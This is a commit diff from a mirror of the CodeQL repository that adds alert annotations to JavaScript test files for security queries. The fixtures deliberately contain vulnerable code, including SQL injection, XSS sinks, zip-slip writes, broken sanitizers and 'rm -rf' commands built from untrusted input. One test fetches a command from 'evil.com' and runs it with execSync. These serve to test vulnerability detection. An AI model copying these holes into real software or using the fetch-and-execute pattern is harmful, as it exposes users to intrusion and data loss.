mirror of
https://github.com/github/codeql.git
synced 2026-04-29 10:45:15 +02:00
JS: Accept trivial test changes
This adds Alert annotations for alerts that seem intentional by the test but has not been annotated with 'NOT OK', or the comment was in the wrong place. In a few cases I included 'Source' expectations to make it easier to see what happened. Other 'Source' expectations will be added in bulk a later commit.
This commit is contained in:
Asger F
@@ -1,3 +1,3 @@
|
||||
function endsWith(x, y) {
|
||||
return x.lastIndexOf(y) === x.length - y.length;
|
||||
return x.lastIndexOf(y) === x.length - y.length; // $ Alert
|
||||
}
|
||||
|
||||
@@ -79,23 +79,23 @@
|
||||
/*
|
||||
* NOT OK: flagged
|
||||
*/
|
||||
/(\.xxx)|(\.yyy)|(\.zzz)$/;
|
||||
/(\.xxx)|(\.yyy)|(\.zzz)$/; // $ Alert
|
||||
/(^left|right|center)\sbottom$/; // not flagged at the moment due to interior anchors
|
||||
/\.xxx|\.yyy|\.zzz$/ig;
|
||||
/\.xxx|\.yyy|zzz$/;
|
||||
/\.xxx|\.yyy|\.zzz$/ig; // $ Alert
|
||||
/\.xxx|\.yyy|zzz$/; // $ Alert
|
||||
/^([A-Z]|xxx[XY]$)/; // not flagged at the moment due to interior anchors
|
||||
/^(xxx yyy zzz)|(xxx yyy)/i;
|
||||
/^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i;
|
||||
/^(xxx:)|(yyy:)|(zzz:)/;
|
||||
/^(xxx?:)|(yyy:zzz\/)/;
|
||||
/^@media|@page/;
|
||||
/^\s*(xxx?|yyy|zzz):|xxx:yyy\//;
|
||||
/^click|mouse|touch/;
|
||||
/^http:\/\/good\.com|http:\/\/better\.com/;
|
||||
/^https?:\/\/good\.com|https?:\/\/better\.com/;
|
||||
/^mouse|touch|click|contextmenu|drop|dragover|dragend/;
|
||||
/^xxx:|yyy:/i;
|
||||
/_xxx|_yyy|_zzz$/;
|
||||
/^(xxx yyy zzz)|(xxx yyy)/i; // $ Alert
|
||||
/^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i; // $ Alert
|
||||
/^(xxx:)|(yyy:)|(zzz:)/; // $ Alert
|
||||
/^(xxx?:)|(yyy:zzz\/)/; // $ Alert
|
||||
/^@media|@page/; // $ Alert
|
||||
/^\s*(xxx?|yyy|zzz):|xxx:yyy\//; // $ Alert
|
||||
/^click|mouse|touch/; // $ Alert
|
||||
/^http:\/\/good\.com|http:\/\/better\.com/; // $ Alert
|
||||
/^https?:\/\/good\.com|https?:\/\/better\.com/; // $ Alert
|
||||
/^mouse|touch|click|contextmenu|drop|dragover|dragend/; // $ Alert
|
||||
/^xxx:|yyy:/i; // $ Alert
|
||||
/_xxx|_yyy|_zzz$/; // $ Alert
|
||||
/em|%$/; // not flagged at the moment due to the anchor not being for letters
|
||||
|
||||
/*
|
||||
|
||||
@@ -74,7 +74,7 @@
|
||||
var urlPatterns = [
|
||||
{regex: /youtu\.be\/([\w\-.]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$1'},
|
||||
{regex: /youtube\.com(.+)v=([^&]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$2'},
|
||||
{regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'},
|
||||
{regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'}, // $ Alert
|
||||
];
|
||||
|
||||
// check optional successsor to TLD
|
||||
|
||||
@@ -2,19 +2,19 @@ let externalLib = require('external-lib');
|
||||
|
||||
let untrusted = window.name;
|
||||
|
||||
externalLib(untrusted);
|
||||
externalLib({x: untrusted});
|
||||
externalLib(...untrusted);
|
||||
externalLib(...window.CONFIG, untrusted);
|
||||
externalLib({ ...untrusted });
|
||||
externalLib(['x', untrusted, 'y']);
|
||||
externalLib('foo', untrusted);
|
||||
externalLib(untrusted); // $ Alert
|
||||
externalLib({x: untrusted}); // $ Alert
|
||||
externalLib(...untrusted); // $ Alert
|
||||
externalLib(...window.CONFIG, untrusted); // $ Alert
|
||||
externalLib({ ...untrusted }); // $ Alert
|
||||
externalLib(['x', untrusted, 'y']); // $ Alert
|
||||
externalLib('foo', untrusted); // $ Alert
|
||||
externalLib({
|
||||
x: {
|
||||
y: {
|
||||
z: untrusted
|
||||
}
|
||||
}
|
||||
} // $ Alert
|
||||
});
|
||||
|
||||
function getDeepUntrusted() {
|
||||
@@ -30,16 +30,16 @@ function getDeepUntrusted() {
|
||||
externalLib(getDeepUntrusted());
|
||||
|
||||
externalLib.get('/foo', (req, res) => {
|
||||
res.send(untrusted);
|
||||
req.app.locals.something.foo(untrusted);
|
||||
res.send(untrusted); // $ Alert
|
||||
req.app.locals.something.foo(untrusted); // $ Alert
|
||||
});
|
||||
|
||||
let jsonSafeParse = require('json-safe-parse');
|
||||
jsonSafeParse(untrusted); // no need to report; has known taint step
|
||||
|
||||
let merge = require('lodash.merge');
|
||||
merge({}, {
|
||||
merge({}, { // $ Alert
|
||||
x: untrusted, // should not be treated as individual named parameters
|
||||
y: untrusted,
|
||||
z: untrusted
|
||||
});
|
||||
}); // $ Alert
|
||||
|
||||
@@ -13,8 +13,8 @@ RegExp(" ");
|
||||
RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z");
|
||||
RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z");
|
||||
RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\=");
|
||||
RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+");
|
||||
RegExp("\[\]\'\\,\.\/");
|
||||
RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); // $ Alert
|
||||
RegExp("\[\]\'\\,\.\/"); // $ Alert
|
||||
RegExp("\{\}\\\"\|\<\>\?");
|
||||
RegExp("\ ");
|
||||
/\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\u\v\\x\y\z"/;
|
||||
@@ -38,7 +38,7 @@ RegExp("\\\\\\\\\a");
|
||||
RegExp("\\\\\\\\\\a");
|
||||
|
||||
// string vs regexp
|
||||
RegExp("\.")
|
||||
RegExp("\.") // $ Alert
|
||||
"\.";
|
||||
|
||||
// other
|
||||
@@ -53,8 +53,8 @@ RegExp("^\\\\Q\\\\E$");
|
||||
RegExp("/\\*");
|
||||
RegExp("/\
|
||||
");
|
||||
RegExp("[\.]");
|
||||
RegExp("a[b\.c]d");
|
||||
RegExp("[\.]"); // $ Alert
|
||||
RegExp("a[b\.c]d"); // $ Alert
|
||||
RegExp("\b");
|
||||
RegExp(`\b`);
|
||||
RegExp(`\k\\k\d\\d`)
|
||||
|
||||
@@ -61,7 +61,7 @@ var server = http.createServer(function(req, res) {
|
||||
var express = require('express');
|
||||
var application = express();
|
||||
|
||||
var views_local = (req, res) => res.render(req.params[0]);
|
||||
var views_local = (req, res) => res.render(req.params[0]); // $ Alert
|
||||
application.get('/views/*', views_local);
|
||||
|
||||
var views_imported = require("./views");
|
||||
@@ -72,10 +72,10 @@ var server = http.createServer(function(req, res) {
|
||||
var server = http.createServer(function(req, res) {
|
||||
let path = url.parse(req.url, true).query.path;
|
||||
|
||||
res.write(fs.readFileSync(fs.realpathSync(path)));
|
||||
res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert
|
||||
fs.realpath(path,
|
||||
function(err, realpath){
|
||||
res.write(fs.readFileSync(realpath));
|
||||
res.write(fs.readFileSync(realpath)); // $ Alert
|
||||
}
|
||||
);
|
||||
|
||||
|
||||
@@ -5,5 +5,5 @@ let app = express();
|
||||
app.use(fileUpload());
|
||||
|
||||
app.get("/some/path", function (req, res) {
|
||||
req.files.foo.mv(req.query.bar);
|
||||
req.files.foo.mv(req.query.bar); // $ Alert
|
||||
});
|
||||
|
||||
@@ -8,11 +8,11 @@ const data = {};
|
||||
|
||||
function init() {
|
||||
hb.registerHelper("catFile", function catFile(filePath) {
|
||||
return fs.readFileSync(filePath); // SINK (reads file)
|
||||
return fs.readFileSync(filePath); // $ Alert
|
||||
});
|
||||
hb.registerHelper("prependToLines", function prependToLines(prefix, filePath) {
|
||||
return fs
|
||||
.readFileSync(filePath)
|
||||
.readFileSync(filePath) // $ Alert
|
||||
.split("\n")
|
||||
.map((line) => prefix + line)
|
||||
.join("\n");
|
||||
@@ -26,7 +26,7 @@ function init() {
|
||||
init();
|
||||
|
||||
app.get('/some/path1', function (req, res) {
|
||||
res.send(data.compiledFileAccess({ path: req.params.path })); // $ Alert - template uses vulnerable catFile
|
||||
res.send(data.compiledFileAccess({ path: req.params.path })); // $ Source - template uses vulnerable catFile
|
||||
});
|
||||
|
||||
app.get('/some/path2', function (req, res) {
|
||||
@@ -40,7 +40,7 @@ app.get('/some/path3', function (req, res) {
|
||||
app.get('/some/path4', function (req, res) {
|
||||
res.send(data.compiledMixed({
|
||||
prefix: ">>> ",
|
||||
path: req.params.path // $ Alert - template uses vulnerable helper
|
||||
path: req.params.path // $ Source - template uses vulnerable helper
|
||||
}));
|
||||
});
|
||||
|
||||
|
||||
@@ -6,11 +6,11 @@ const parseTorrent = require('parse-torrent');
|
||||
|
||||
const browser = await puppeteer.launch();
|
||||
const page = await browser.newPage();
|
||||
await page.pdf({ path: tainted, format: 'a4' });
|
||||
await page.pdf({ path: tainted, format: 'a4' }); // $ Alert
|
||||
|
||||
const pages = await browser.pages();
|
||||
for (let i = 0; i < something(); i++) {
|
||||
pages[i].screenshot({ path: tainted });
|
||||
pages[i].screenshot({ path: tainted }); // $ Alert
|
||||
}
|
||||
|
||||
await browser.close();
|
||||
|
||||
@@ -1 +1 @@
|
||||
module.exports = (req, res) => res.render(req.params[0]);
|
||||
module.exports = (req, res) => res.render(req.params[0]); // $ Alert
|
||||
|
||||
@@ -3,5 +3,5 @@ var AdmZip = require('adm-zip');
|
||||
var zip = new AdmZip("archive.zip");
|
||||
var zipEntries = zip.getEntries();
|
||||
zipEntries.forEach(function(zipEntry) {
|
||||
fs.createWriteStream(zipEntry.entryName);
|
||||
fs.createWriteStream(zipEntry.entryName); // $ Alert
|
||||
});
|
||||
|
||||
@@ -3,10 +3,10 @@ const tar = require('tar-stream');
|
||||
const extract = tar.extract();
|
||||
|
||||
extract.on('entry', (header, stream, next) => {
|
||||
const out = fs.createWriteStream(header.name);
|
||||
const out = fs.createWriteStream(header.name); // $ Alert
|
||||
|
||||
if (header.linkname) {
|
||||
fs.linkSync(header.linkname, "foo");
|
||||
fs.linkSync(header.linkname, "foo"); // $ Alert
|
||||
}
|
||||
|
||||
stream.pipe(out);
|
||||
|
||||
@@ -4,7 +4,7 @@ const unzip = require('unzip');
|
||||
fs.createReadStream('archive.zip')
|
||||
.pipe(unzip.Parse())
|
||||
.on('entry', entry => {
|
||||
const fileName = entry.path;
|
||||
const fileName = entry.path; // $ Alert
|
||||
entry.pipe(fs.createWriteStream(fileName));
|
||||
});
|
||||
|
||||
@@ -12,14 +12,14 @@ var Writer = require('fstream').Writer;
|
||||
fs.createReadStream('archive.zip')
|
||||
.pipe(unzip.Parse())
|
||||
.on('entry', entry => {
|
||||
const fileName = entry.path;
|
||||
const fileName = entry.path; // $ Alert
|
||||
entry.pipe(Writer({path: fileName}));
|
||||
});
|
||||
|
||||
fs.createReadStream('archive.zip')
|
||||
.pipe(unzip.Parse())
|
||||
.on('entry', entry => {
|
||||
const fileName = entry.path;
|
||||
const fileName = entry.path; // $ Alert
|
||||
var file = fs.openSync(fileName, "w");
|
||||
});
|
||||
|
||||
@@ -27,11 +27,11 @@ const JSZip = require('jszip');
|
||||
const zip = new JSZip();
|
||||
const path = require('path');
|
||||
function doZipSlip() {
|
||||
for (const name in zip.files) {
|
||||
for (const name in zip.files) { // $ Alert
|
||||
fs.createWriteStream(name);
|
||||
}
|
||||
|
||||
zip.forEach((name, file) => {
|
||||
zip.forEach((name, file) => { // $ Alert
|
||||
fs.createWriteStream(name);
|
||||
});
|
||||
|
||||
|
||||
@@ -2,7 +2,7 @@ var fs = require('fs');
|
||||
var unzip = require('unzip');
|
||||
fs.readFile('path/to/archive.zip', function (err, zipContents) {
|
||||
unzip.Parse(zipContents).on('entry', function (entry) {
|
||||
var fileName = 'output/path/' + entry.path;
|
||||
var fileName = 'output/path/' + entry.path; // $ Alert
|
||||
fs.writeFileSync(fileName, entry.contents);
|
||||
});
|
||||
});
|
||||
|
||||
@@ -4,6 +4,6 @@ const unzipper = require('unzipper');
|
||||
fs.createReadStream('path/to/archive.zip')
|
||||
.pipe(unzipper.Parse())
|
||||
.on('entry', function (entry) {
|
||||
var fileName = entry.path;
|
||||
var fileName = entry.path; // $ Alert
|
||||
entry.pipe(fs.createWriteStream(fileName));
|
||||
});
|
||||
|
||||
@@ -3,6 +3,6 @@ let https = require("https"),
|
||||
|
||||
https.get("https://evil.com/getCommand", res =>
|
||||
res.on("data", command => {
|
||||
cp.execSync(command);
|
||||
cp.execSync(command); // $ Alert
|
||||
})
|
||||
);
|
||||
|
||||
@@ -158,7 +158,7 @@ module.exports.indirect2 = function (name) {
|
||||
let args = ["-c", cmd];
|
||||
cp.spawn(sh, args, cb);
|
||||
|
||||
let cmd2 = "rm -rf " + name;
|
||||
let cmd2 = "rm -rf " + name; // $ Alert
|
||||
var args2 = [cmd2];
|
||||
cp.spawn(
|
||||
'cmd.exe',
|
||||
@@ -178,7 +178,7 @@ module.exports.sanitizer = function (name) {
|
||||
var sanitized = "'" + name.replace(/'/g, "'\\''") + "'"
|
||||
cp.exec("rm -rf " + sanitized);
|
||||
|
||||
var broken = "'" + name.replace(/'/g, "'\''") + "'"
|
||||
var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert
|
||||
cp.exec("rm -rf " + broken); // $ Alert
|
||||
}
|
||||
|
||||
@@ -551,8 +551,8 @@ module.exports.shellThing = function (name) {
|
||||
function indirectShell(cmd, args, spawnOpts) {
|
||||
cp.spawn(cmd, args, spawnOpts); // $ Alert
|
||||
}
|
||||
|
||||
indirectShell("rm", ["-rf", name], {shell: true});
|
||||
|
||||
indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert
|
||||
}
|
||||
|
||||
module.exports.badSanitizer = function (name) {
|
||||
@@ -630,7 +630,7 @@ module.exports.veryIndeirect = function (name) {
|
||||
}
|
||||
|
||||
module.exports.sanitizer = function (name) {
|
||||
var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'"
|
||||
var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert
|
||||
cp.exec("rm -rf " + sanitized); // $ Alert
|
||||
|
||||
var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'"
|
||||
|
||||
@@ -70,7 +70,7 @@ async function getClipboardData(e: ClipboardEvent): Promise<Array<File | string>
|
||||
if (e.clipboardData.types.includes('text/html')) {
|
||||
const droppedHtml = e.clipboardData.getData('text/html');
|
||||
const container = document.createElement('html');
|
||||
container.innerHTML = droppedHtml;
|
||||
container.innerHTML = droppedHtml; // $ Alert
|
||||
const imgs = container.getElementsByTagName('img');
|
||||
if (imgs.length === 1) {
|
||||
const src = imgs[0].src;
|
||||
|
||||
@@ -70,7 +70,7 @@ async function getDropData(e: DragEvent): Promise<Array<File | string>> {
|
||||
if (e.dataTransfer.types.includes('text/html')) {
|
||||
const droppedHtml = e.dataTransfer.getData('text/html');
|
||||
const container = document.createElement('html');
|
||||
container.innerHTML = droppedHtml;
|
||||
container.innerHTML = droppedHtml; // $ Alert
|
||||
const imgs = container.getElementsByTagName('img');
|
||||
if (imgs.length === 1) {
|
||||
const src = imgs[0].src;
|
||||
|
||||
@@ -1,3 +1,3 @@
|
||||
export function createHtml(x) {
|
||||
return x;
|
||||
return x; // $ Alert
|
||||
}
|
||||
|
||||
@@ -232,7 +232,7 @@ function react(){
|
||||
}
|
||||
|
||||
render() {
|
||||
return <span dangerouslySetInnerHTML={{__html: this.state.stateTainted}}/>;
|
||||
return <span dangerouslySetInnerHTML={{__html: this.state.stateTainted}}/>; // $ Alert
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
function test(elt) {
|
||||
var tainted = document.location.search.substring(1);
|
||||
WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted);
|
||||
WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted);
|
||||
WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert
|
||||
WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert
|
||||
}
|
||||
|
||||
@@ -118,7 +118,7 @@ app.get("invalid/keys/:id", async (req, res) => {
|
||||
const invalidKeys = keyArray.filter(key => !whitelist.includes(key));
|
||||
|
||||
if (invalidKeys.length) {
|
||||
res.status(400).send(`${invalidKeys.join(', ')} not in whitelist`);
|
||||
res.status(400).send(`${invalidKeys.join(', ')} not in whitelist`); // $ Alert
|
||||
return;
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
@@ -8,5 +8,5 @@ app.get("/some/path", (req, res) => {
|
||||
if(req.query.jsonp && isVarName(req.query.jsonp))
|
||||
response = req.query.jsonp + "(" + response + ")";
|
||||
|
||||
res.send(response);
|
||||
res.send(response); // $ Alert
|
||||
});
|
||||
|
||||
@@ -5,14 +5,14 @@ export default function Post() {
|
||||
Post.getInitialProps = async (ctx) => {
|
||||
const req = ctx.req;
|
||||
const res = ctx.res;
|
||||
res.end(req.url);
|
||||
res.end(req.url); // $ Alert
|
||||
return {}
|
||||
}
|
||||
|
||||
export async function getServerSideProps(ctx) {
|
||||
const req = ctx.req;
|
||||
const res = ctx.res;
|
||||
res.end(req.url);
|
||||
res.end(req.url); // $ Alert
|
||||
return {
|
||||
props: {}
|
||||
}
|
||||
|
||||
@@ -1,3 +1,3 @@
|
||||
export default function handler(req, res) {
|
||||
res.send(req.url);
|
||||
res.send(req.url); // $ Alert
|
||||
}
|
||||
@@ -14,7 +14,7 @@ new Router().get("/hello", (ctx) => {
|
||||
conditions.push(`version = ${version}`)
|
||||
}
|
||||
|
||||
new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null);
|
||||
new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // $ Alert
|
||||
});
|
||||
|
||||
function validVersion(version) {
|
||||
|
||||
@@ -8,6 +8,6 @@ var db = new sqlite3.Database(':memory:');
|
||||
var io = require('socket.io')();
|
||||
io.on('connection', (socket) => {
|
||||
socket.on('newuser', (handle) => {
|
||||
db.run(`INSERT INTO users(name) VALUES ${handle}`);
|
||||
db.run(`INSERT INTO users(name) VALUES ${handle}`); // $ Alert
|
||||
});
|
||||
});
|
||||
|
||||
@@ -7,5 +7,5 @@ var db = new sqlite3.Database(':memory:');
|
||||
|
||||
var app = express();
|
||||
app.get('/post/:id', function(req, res) {
|
||||
db.get('SELECT * FROM Post WHERE id = "' + req.params.id + '"');
|
||||
db.get('SELECT * FROM Post WHERE id = "' + req.params.id + '"'); // $ Alert
|
||||
});
|
||||
|
||||
@@ -5,5 +5,5 @@ var db = new sqlite3.Database(':memory:');
|
||||
|
||||
angular.module('myApp', ['ngRoute'])
|
||||
.controller('FindPost', function($routeParams) {
|
||||
db.get('SELECT * FROM Post WHERE id = "' + $routeParams.id + '"');
|
||||
db.get('SELECT * FROM Post WHERE id = "' + $routeParams.id + '"'); // $ Alert
|
||||
});
|
||||
|
||||
@@ -19,7 +19,7 @@ const matter = require("gray-matter");
|
||||
export function greySink(data) {
|
||||
const str = `
|
||||
---js
|
||||
${data}
|
||||
${data /* $ Alert[js/unsafe-code-construction] */}
|
||||
---
|
||||
`
|
||||
const res = matter(str);
|
||||
|
||||
@@ -7,7 +7,7 @@ class Application extends React.Component {
|
||||
<div className="application">
|
||||
<Helmet>
|
||||
<title>My unsafe</title>
|
||||
<script type="application/javascript">{document.location.hash}</script>
|
||||
<script type="application/javascript">{document.location.hash}</script> {/* $ Alert[js/code-injection] */}
|
||||
</Helmet>
|
||||
</div>
|
||||
);
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
function badEncode(s) {
|
||||
return s.replace(/"/g, """)
|
||||
.replace(/'/g, "'")
|
||||
.replace(/&/g, "&");
|
||||
.replace(/&/g, "&"); // $ Alert
|
||||
}
|
||||
|
||||
function goodEncode(s) {
|
||||
@@ -17,7 +17,7 @@ function goodDecode(s) {
|
||||
}
|
||||
|
||||
function badDecode(s) {
|
||||
return s.replace(/&/g, "&")
|
||||
return s.replace(/&/g, "&") // $ Alert
|
||||
.replace(/"/g, "\"")
|
||||
.replace(/'/g, "'");
|
||||
}
|
||||
@@ -27,7 +27,7 @@ function cleverEncode(code) {
|
||||
}
|
||||
|
||||
function badDecode2(s) {
|
||||
return s.replace(/&/g, "&")
|
||||
return s.replace(/&/g, "&") // $ Alert
|
||||
.replace(/s?ome|thin*g/g, "else")
|
||||
.replace(/'/g, "'");
|
||||
}
|
||||
@@ -44,20 +44,20 @@ function goodDecodeInLoop(ss) {
|
||||
}
|
||||
|
||||
function badDecode3(s) {
|
||||
s = s.replace(/&/g, "&");
|
||||
s = s.replace(/&/g, "&"); // $ Alert
|
||||
s = s.replace(/"/g, "\"");
|
||||
return s.replace(/'/g, "'");
|
||||
}
|
||||
|
||||
function badUnescape(s) {
|
||||
return s.replace(/\\\\/g, '\\')
|
||||
return s.replace(/\\\\/g, '\\') // $ Alert
|
||||
.replace(/\\'/g, '\'')
|
||||
.replace(/\\"/g, '\"');
|
||||
}
|
||||
|
||||
function badPercentEscape(s) {
|
||||
s = s.replace(/&/g, '%26');
|
||||
s = s.replace(/%/g, '%25');
|
||||
s = s.replace(/%/g, '%25'); // $ Alert
|
||||
return s;
|
||||
}
|
||||
|
||||
@@ -67,7 +67,7 @@ function badEncode(s) {
|
||||
var indirect3 = /&/g;
|
||||
return s.replace(indirect1, """)
|
||||
.replace(indirect2, "'")
|
||||
.replace(indirect3, "&");
|
||||
.replace(indirect3, "&"); // $ Alert
|
||||
}
|
||||
|
||||
function badEncodeWithReplacer(s) {
|
||||
@@ -76,7 +76,7 @@ function badEncodeWithReplacer(s) {
|
||||
"'": "'",
|
||||
"&": "&"
|
||||
};
|
||||
return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&");
|
||||
return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); // $ Alert
|
||||
}
|
||||
|
||||
// dubious, but out of scope for this query
|
||||
|
||||
@@ -2,71 +2,71 @@ let express = require('express');
|
||||
var app = express();
|
||||
|
||||
function bad1(s) {
|
||||
return s.replace("'", ""); // $ Alert
|
||||
return s.replace("'", ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad2(s) {
|
||||
return s.replace(/'/, ""); // $ Alert
|
||||
return s.replace(/'/, ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad3(s) {
|
||||
return s.replace(/'/g, "\\'"); // $ Alert
|
||||
return s.replace(/'/g, "\\'"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad4(s) {
|
||||
return s.replace(/'/g, "\\$&"); // $ Alert
|
||||
return s.replace(/'/g, "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad5(s) {
|
||||
return s.replace(/['"]/g, "\\$&"); // $ Alert
|
||||
return s.replace(/['"]/g, "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad6(s) {
|
||||
return s.replace(/(['"])/g, "\\$1"); // $ Alert
|
||||
return s.replace(/(['"])/g, "\\$1"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad7(s) {
|
||||
return s.replace(/('|")/g, "\\$1"); // $ Alert
|
||||
return s.replace(/('|")/g, "\\$1"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad8(s) {
|
||||
return s.replace('|', ''); // $ Alert
|
||||
return s.replace('|', ''); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad9(s) {
|
||||
return s.replace(/"/g, "\\\""); // $ Alert
|
||||
return s.replace(/"/g, "\\\""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad10(s) {
|
||||
return s.replace("/", "%2F"); // $ Alert
|
||||
return s.replace("/", "%2F"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad11(s) {
|
||||
return s.replace("%25", "%"); // $ Alert
|
||||
return s.replace("%25", "%"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad12(s) {
|
||||
return s.replace(`'`, ""); // $ Alert
|
||||
return s.replace(`'`, ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad13(s) {
|
||||
return s.replace("'", ``); // $ Alert
|
||||
return s.replace("'", ``); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad14(s) {
|
||||
return s.replace(`'`, ``); // $ Alert
|
||||
return s.replace(`'`, ``); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad15(s) {
|
||||
return s.replace("'" + "", ""); // $ Alert
|
||||
return s.replace("'" + "", ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad16(s) {
|
||||
return s.replace("'", "" + ""); // $ Alert
|
||||
return s.replace("'", "" + ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad17(s) {
|
||||
return s.replace("'" + "", "" + ""); // $ Alert
|
||||
return s.replace("'" + "", "" + ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function good1(s) {
|
||||
@@ -130,23 +130,23 @@ function good12(s) {
|
||||
s.replace('[', '').replace(']', '');
|
||||
s.replace('(', '').replace(')', '');
|
||||
s.replace('{', '').replace('}', '');
|
||||
s.replace('<', '').replace('>', ''); // $ Alert - too common as a bad HTML sanitizer
|
||||
s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer
|
||||
|
||||
s.replace('[', '\\[').replace(']', '\\]'); // $ Alert
|
||||
s.replace('{', '\\{').replace('}', '\\}'); // $ Alert
|
||||
s.replace('[', '\\[').replace(']', '\\]');
|
||||
s.replace('{', '\\{').replace('}', '\\}');
|
||||
|
||||
s = s.replace('[', '');
|
||||
s = s.replace(']', '');
|
||||
s.replace(/{/, '').replace(/}/, ''); // $ Alert - should have used a string literal if a single replacement was intended
|
||||
s.replace(']', '').replace('[', ''); // probably OK, but still flagged
|
||||
s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended
|
||||
s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged
|
||||
}
|
||||
|
||||
function newlines(s) {
|
||||
// motivation for whitelist
|
||||
require("child_process").execSync("which emacs").toString().replace("\n", "");
|
||||
|
||||
x.replace("\n", "").replace(x, y); // $ Alert
|
||||
x.replace(x, y).replace("\n", ""); // $ Alert
|
||||
x.replace("\n", "").replace(x, y);
|
||||
x.replace(x, y).replace("\n", "");
|
||||
}
|
||||
|
||||
app.get('/some/path', function(req, res) {
|
||||
@@ -190,7 +190,7 @@ app.get('/some/path', function(req, res) {
|
||||
|
||||
(function (s) {
|
||||
var indirect = /'/;
|
||||
return s.replace(indirect, ""); // $ Alert
|
||||
return s.replace(indirect, ""); // $ Alert[js/incomplete-sanitization]
|
||||
});
|
||||
|
||||
(function (s) {
|
||||
@@ -199,20 +199,20 @@ app.get('/some/path', function(req, res) {
|
||||
});
|
||||
|
||||
function bad18(p) {
|
||||
return p.replace("/../", ""); // $ Alert
|
||||
return p.replace("/../", ""); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function typicalBadHtmlSanitizers(s) {
|
||||
s().replace(/[<>]/g,''); // $ Alert
|
||||
s().replace(/[<>&]/g, ''); // $ Alert
|
||||
s().replace(/[<>"]/g, ''); // $ Alert
|
||||
s().replace(/</g, '').replace(/>/g, ''); // $ Alert
|
||||
s().replace(/</g, '').replace(/>/g, '').replace(/&/g, ''); // $ Alert
|
||||
s().replace(/</g, '').replace(/&/g, '').replace(/>/g, ''); // $ Alert
|
||||
s().replace(/&/g, '').replace(/>/g, '').replace(/</g, ''); // $ Alert
|
||||
s().replace(/[<>]/g,'');
|
||||
s().replace(/[<>&]/g, '');
|
||||
s().replace(/[<>"]/g, '');
|
||||
s().replace(/</g, '').replace(/>/g, '');
|
||||
s().replace(/</g, '').replace(/>/g, '').replace(/&/g, '');
|
||||
s().replace(/</g, '').replace(/&/g, '').replace(/>/g, '');
|
||||
s().replace(/&/g, '').replace(/>/g, '').replace(/</g, '');
|
||||
|
||||
var s = s().replace(/</g, '');
|
||||
s = s.replace(/>/g, ''); // $ Alert
|
||||
s = s.replace(/>/g, '');
|
||||
s().replace(/</g, '<').replace(/>/g, '>').replace(/&/g, '&').replace(/"/g, '"');
|
||||
s().replace(/</g, '<').replace(/>/g, '>').replace(/&/g, '&').replace(/'/g, '''); // OK - single quotes or double quotes both work
|
||||
|
||||
@@ -306,7 +306,7 @@ function incompleteHtmlAttributeSanitization2() {
|
||||
}
|
||||
|
||||
function incompleteComplexSanitizers() {
|
||||
'=\'' + s().replace(/[&<>"]/gm, function (str) { // $ Alert
|
||||
'=\'' + s().replace(/[&<>"]/gm, function (str) {
|
||||
if (str === "&")
|
||||
return "&";
|
||||
if (str === "<")
|
||||
@@ -315,7 +315,7 @@ function incompleteComplexSanitizers() {
|
||||
return ">";
|
||||
